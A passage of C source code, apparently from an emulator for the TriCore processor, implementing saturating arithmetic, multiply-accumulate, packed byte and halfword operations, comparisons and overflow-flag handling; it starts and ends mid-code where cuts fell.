result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if ((int64_t)r1 >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } return result; } target_ulong helper_sub_h_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = sextract32(r1, 0, 16) - sextract32(r2, 0, 16); ret_hw1 = sextract32(r1, 16, 16) - sextract32(r2, 16, 16); return ssov16(env, ret_hw0, ret_hw1); } uint32_t helper_subr_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_subadr_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } target_ulong helper_sub_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = extract64(r1, 0, 32); int64_t t2 = extract64(r2, 0, 32); int64_t result = t1 - t2; return suov32_neg(env, result); } target_ulong helper_sub_h_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = extract32(r1, 0, 16) - extract32(r2, 0, 16); ret_hw1 = extract32(r1, 16, 16) - extract32(r2, 16, 16); return suov16(env, ret_hw0, ret_hw1); } target_ulong helper_mul_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result = t1 * t2; return ssov32(env, result); } target_ulong helper_mul_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = extract64(r1, 0, 32); int64_t t2 = extract64(r2, 0, 32); int64_t result = t1 * t2; return suov32_pos(env, result); } target_ulong helper_sha_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int32_t t2 = sextract64(r2, 0, 6); int64_t result; if (t2 == 0) { result = t1; } else if (t2 > 0) { result = t1 << t2; } else { result = t1 >> -t2; } return ssov32(env, result); } uint32_t helper_abs_ssov(CPUTriCoreState *env, target_ulong r1) { target_ulong result; result = ((int32_t)r1 >= 0) ? r1 : (0 - r1); return ssov32(env, result); } uint32_t helper_abs_h_ssov(CPUTriCoreState *env, target_ulong r1) { int32_t ret_h0, ret_h1; ret_h0 = sextract32(r1, 0, 16); ret_h0 = (ret_h0 >= 0) ? ret_h0 : (0 - ret_h0); ret_h1 = sextract32(r1, 16, 16); ret_h1 = (ret_h1 >= 0) ? ret_h1 : (0 - ret_h1); return ssov16(env, ret_h0, ret_h1); } target_ulong helper_absdif_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result; if (t1 > t2) { result = t1 - t2; } else { result = t2 - t1; } return ssov32(env, result); } uint32_t helper_absdif_h_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t t1, t2; int32_t ret_h0, ret_h1; t1 = sextract32(r1, 0, 16); t2 = sextract32(r2, 0, 16); if (t1 > t2) { ret_h0 = t1 - t2; } else { ret_h0 = t2 - t1; } t1 = sextract32(r1, 16, 16); t2 = sextract32(r2, 16, 16); if (t1 > t2) { ret_h1 = t1 - t2; } else { ret_h1 = t2 - t1; } return ssov16(env, ret_h0, ret_h1); } target_ulong helper_madd32_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result; result = t2 + (t1 * t3); return ssov32(env, result); } target_ulong helper_madd32_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { uint64_t t1 = extract64(r1, 0, 32); uint64_t t2 = extract64(r2, 0, 32); uint64_t t3 = extract64(r3, 0, 32); int64_t result; result = t2 + (t1 * t3); return suov32_pos(env, result); } uint64_t helper_madd64_ssov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, ovf; int64_t t1 = sextract64(r1, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul; mul = t1 * t3; ret = mul + r2; ovf = (ret ^ mul) & ~(mul ^ r2); t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if ((int64_t)ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul >= 0) { ret = INT64_MAX; /* ext_ret < MIN_INT */ } else { ret = INT64_MIN; } } else { env->PSW_USB_V = 0; } return ret; } uint32_t helper_madd32_q_add_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { int64_t result; result = (r1 + r2); env->PSW_USB_AV = (result ^ result * 2u); env->PSW_USB_SAV |= env->PSW_USB_AV; /* we do the saturation by hand, since we produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if (r2 == 0x8000000000000000LL) { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else { env->PSW_USB_V = 0; } } else { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else { env->PSW_USB_V = 0; } } return (uint32_t)result; } uint64_t helper_madd64_q_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = (int64_t)r1; int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result, mul; int64_t ovf; mul = (t2 * t3) << n; result = mul + t1; env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; ovf = (result ^ mul) & ~(mul ^ t1); /* we do the saturation by hand, since we produce an overflow on the host if the mul was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if ((r2 == 0x80000000) && (r3 == 0x80000000) && (n == 1)) { if (ovf >= 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul < 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } else { if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } return (uint64_t)result; } uint32_t helper_maddr_q_ssov(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 + mul + 0x8000; env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret > 0x7fffffffll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MAX; } else if (ret < -0x80000000ll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MIN; } else { env->PSW_USB_V = 0; } return ret & 0xffff0000ll; } uint64_t helper_madd64_suov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, mul; uint64_t t1 = extract64(r1, 0, 32); uint64_t t3 = extract64(r3, 0, 32); mul = t1 * t3; ret = mul + r2; t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret < r2) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* saturate */ ret = UINT64_MAX; } else { env->PSW_USB_V = 0; } return ret; } target_ulong helper_msub32_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result; result = t2 - (t1 * t3); return ssov32(env, result); } target_ulong helper_msub32_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2, target_ulong r3) { uint64_t t1 = extract64(r1, 0, 32); uint64_t t2 = extract64(r2, 0, 32); uint64_t t3 = extract64(r3, 0, 32); uint64_t result; uint64_t mul; mul = (t1 * t3); result = t2 - mul; env->PSW_USB_AV = result ^ result * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; /* we calculate ovf by hand here, because the multiplication can overflow on the host, which would give false results if we compare to less than zero */ if (mul > t2) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = 0; } else { env->PSW_USB_V = 0; } return result; } uint64_t helper_msub64_ssov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, ovf; int64_t t1 = sextract64(r1, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul; mul = t1 * t3; ret = r2 - mul; ovf = (ret ^ r2) & (mul ^ r2); t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if ((int64_t)ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul < 0) { ret = INT64_MAX; /* ext_ret < MIN_INT */ } else { ret = INT64_MIN; } } else { env->PSW_USB_V = 0; } return ret; } uint64_t helper_msub64_suov(CPUTriCoreState *env, target_ulong r1, uint64_t r2, target_ulong r3) { uint64_t ret, mul; uint64_t t1 = extract64(r1, 0, 32); uint64_t t3 = extract64(r3, 0, 32); mul = t1 * t3; ret = r2 - mul; t1 = ret >> 32; env->PSW_USB_AV = t1 ^ t1 * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret > r2) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* saturate */ ret = 0; } else { env->PSW_USB_V = 0; } return ret; } uint32_t helper_msub32_q_sub_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { int64_t result; int64_t t1 = (int64_t)r1; int64_t t2 = (int64_t)r2; result = t1 - t2; env->PSW_USB_AV = (result ^ result * 2u); env->PSW_USB_SAV |= env->PSW_USB_AV; /* we do the saturation by hand, since we produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if (r2 == 0x8000000000000000LL) { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else { env->PSW_USB_V = 0; } } else { if (result > 0x7fffffffLL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MAX; } else if (result < -0x80000000LL) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); result = INT32_MIN; } else { env->PSW_USB_V = 0; } } return (uint32_t)result; } uint64_t helper_msub64_q_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = (int64_t)r1; int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t result, mul; int64_t ovf; mul = (t2 * t3) << n; result = t1 - mul; env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; ovf = (result ^ t1) & (t1 ^ mul); /* we do the saturation by hand, since we produce an overflow on the host if the mul before was (0x80000000 * 0x80000000) << 1). If this is the case, we flip the saturated value. */ if (mul == 0x8000000000000000LL) { if (ovf >= 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } else { if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if (mul < 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } } return (uint64_t)result; } uint32_t helper_msubr_q_ssov(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 - mul + 0x8000; env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ret > 0x7fffffffll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MAX; } else if (ret < -0x80000000ll) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; ret = INT32_MIN; } else { env->PSW_USB_V = 0; } return ret & 0xffff0000ll; } uint32_t helper_abs_b(CPUTriCoreState *env, target_ulong arg) { int32_t b, i; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 4; i++) { b = sextract32(arg, i * 8, 8); b = (b >= 0) ? b : (0 - b); ovf |= (b > 0x7F) || (b < -0x80); avf |= b ^ b * 2u; ret |= (b & 0xff) << (i * 8); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_abs_h(CPUTriCoreState *env, target_ulong arg) { int32_t h, i; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { h = sextract32(arg, i * 16, 16); h = (h >= 0) ? h : (0 - h); ovf |= (h > 0x7FFF) || (h < -0x8000); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_absdif_b(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t b, i; int32_t extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 4; i++) { extr_r2 = sextract32(r2, i * 8, 8); b = sextract32(r1, i * 8, 8); b = (b > extr_r2) ? (b - extr_r2) : (extr_r2 - b); ovf |= (b > 0x7F) || (b < -0x80); avf |= b ^ b * 2u; ret |= (b & 0xff) << (i * 8); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_absdif_h(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t h, i; int32_t extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { extr_r2 = sextract32(r2, i * 16, 16); h = sextract32(r1, i * 16, 16); h = (h > extr_r2) ? (h - extr_r2) : (extr_r2 - h); ovf |= (h > 0x7FFF) || (h < -0x8000); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = ovf << 31; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_addr_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_addsur_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_maddr_q(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 + mul + 0x8000; if ((ret > 0x7fffffffll) || (ret < -0x80000000ll)) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; } else { env->PSW_USB_V = 0; } env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret & 0xffff0000ll; } uint32_t helper_add_b(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t b, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; uint32_t ret = 0; for (i = 0; i < 4; i++) { extr_r1 = sextract32(r1, i * 8, 8); extr_r2 = sextract32(r2, i * 8, 8); b = extr_r1 + extr_r2; ovf |= ((b > 0x7f) || (b < -0x80)); avf |= b ^ b * 2u; ret |= ((b & 0xff) << (i*8)); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_add_h(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t h, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { extr_r1 = sextract32(r1, i * 16, 16); extr_r2 = sextract32(r2, i * 16, 16); h = extr_r1 + extr_r2; ovf |= ((h > 0x7fff) || (h < -0x8000)); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = (avf << 16); env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_subr_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_subadr_h(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high - mul_res1 + 0x8000; if ((result0 > INT32_MAX) || (result0 < INT32_MIN)) { ovf0 = (1 << 31); } if ((result1 > INT32_MAX) || (result1 < INT32_MIN)) { ovf1 = (1 << 31); } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_msubr_q(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3, uint32_t n) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t t3 = sextract64(r3, 0, 32); int64_t mul, ret; if ((t2 == -0x8000ll) && (t3 == -0x8000ll) && (n == 1)) { mul = 0x7fffffff; } else { mul = (t2 * t3) << n; } ret = t1 - mul + 0x8000; if ((ret > 0x7fffffffll) || (ret < -0x80000000ll)) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV |= env->PSW_USB_V; } else { env->PSW_USB_V = 0; } env->PSW_USB_AV = ret ^ ret * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret & 0xffff0000ll; } uint32_t helper_sub_b(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t b, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; uint32_t ret = 0; for (i = 0; i < 4; i++) { extr_r1 = sextract32(r1, i * 8, 8); extr_r2 = sextract32(r2, i * 8, 8); b = extr_r1 - extr_r2; ovf |= ((b > 0x7f) || (b < -0x80)); avf |= b ^ b * 2u; ret |= ((b & 0xff) << (i*8)); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 24; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_sub_h(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t h, i; int32_t extr_r1, extr_r2; int32_t ovf = 0; int32_t avf = 0; int32_t ret = 0; for (i = 0; i < 2; i++) { extr_r1 = sextract32(r1, i * 16, 16); extr_r2 = sextract32(r2, i * 16, 16); h = extr_r1 - extr_r2; ovf |= ((h > 0x7fff) || (h < -0x8000)); avf |= h ^ h * 2u; ret |= (h & 0xffff) << (i * 16); } env->PSW_USB_V = (ovf << 31); env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } uint32_t helper_eq_b(target_ulong r1, target_ulong r2) { int32_t ret; int32_t i, msk; ret = 0; msk = 0xff; for (i = 0; i < 4; i++) { if ((r1 & msk) == (r2 & msk)) { ret |= msk; } msk = msk << 8; } return ret; } uint32_t helper_eq_h(target_ulong r1, target_ulong r2) { int32_t ret = 0; if ((r1 & 0xffff) == (r2 & 0xffff)) { ret = 0xffff; } if ((r1 & 0xffff0000) == (r2 & 0xffff0000)) { ret |= 0xffff0000; } return ret; } uint32_t helper_eqany_b(target_ulong r1, target_ulong r2) { int32_t i; uint32_t ret = 0; for (i = 0; i < 4; i++) { ret |= (sextract32(r1, i * 8, 8) == sextract32(r2, i * 8, 8)); } return ret; } uint32_t helper_eqany_h(target_ulong r1, target_ulong r2) { uint32_t ret; ret = (sextract32(r1, 0, 16) == sextract32(r2, 0, 16)); ret |= (sextract32(r1, 16, 16) == sextract32(r2, 16, 16)); return ret; } uint32_t helper_lt_b(target_ulong r1, target_ulong r2) { int32_t i; uint32_t ret = 0; for (i = 0; i < 4; i++) { if (sextract32(r1, i * 8, 8) < sextract32(r2, i * 8, 8)) { ret |= (0xff << (i * 8)); } } return ret; } uint32_t helper_lt_bu(target_ulong r1, target_ulong r2) { int32_t i; uint32_t ret = 0; for (i = 0; i < 4; i++) { if (extract32(r1, i * 8, 8) < extract32(r2, i * 8, 8)) { ret |= (0xff << (i * 8)); } } return ret; } uint32_t helper_lt_h(target_ulong r1, target_ulong r2) { uint32_t ret = 0; if (sextract32(r1, 0, 16) < sextract32(r2, 0, 16)) { ret |= 0xffff; } if (sextract32(r1, 16, 16) < sextract32(r2, 16, 16)) { ret |= 0xffff0000; } return ret; } uint32_t helper_lt_hu(target_ulong r1, target_ulong r2) { uint32_t ret = 0; if (extract32(r1, 0, 16) < extract32(r2, 0, 16)) { ret |= 0xffff; } if (extract32(r1, 16, 16) < extract32(r2, 16, 16)) { ret |= 0xffff0000; } return ret; } #define EXTREMA_H_B(name, op) \ uint32_t helper_##name ##_b(target_ulong r1, target_ulong r2) \ { \ int32_t i, extr_r1, extr_r2; \ uint32_t ret = 0; \ \ for (i = 0; i < 4; i++) { \ extr_r1 = sextract32(r1, i * 8, 8); \ extr_r2 = sextract32(r2, i * 8, 8); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= (extr_r1 & 0xff) << (i * 8); \ } \ return ret; \ } \ \ uint32_t helper_##name ##_bu(target_ulong r1, target_ulong r2)\ { \ int32_t i; \ uint32_t extr_r1, extr_r2; \ uint32_t ret = 0; \ \ for (i = 0; i < 4; i++) { \ extr_r1 = extract32(r1, i * 8, 8); \ extr_r2 = extract32(r2, i * 8, 8); \ extr_r1 = (extr_r1 op extr_r2) ? extr_r1 : extr_r2; \ ret |= (extr_r1 & 0xff) << (i * 8); \ } \ return ret; \ } \ \ uint32_t helper_##name ##_h(target_ulong r1, target_ulong r2) \ { \ int32_t extr_r1, extr_r2; \ uint32_t ret = 0; \ \ extr_r1 = sextract32(r1, 0, 16); \ extr_r2 = sextract32(r2, 0, 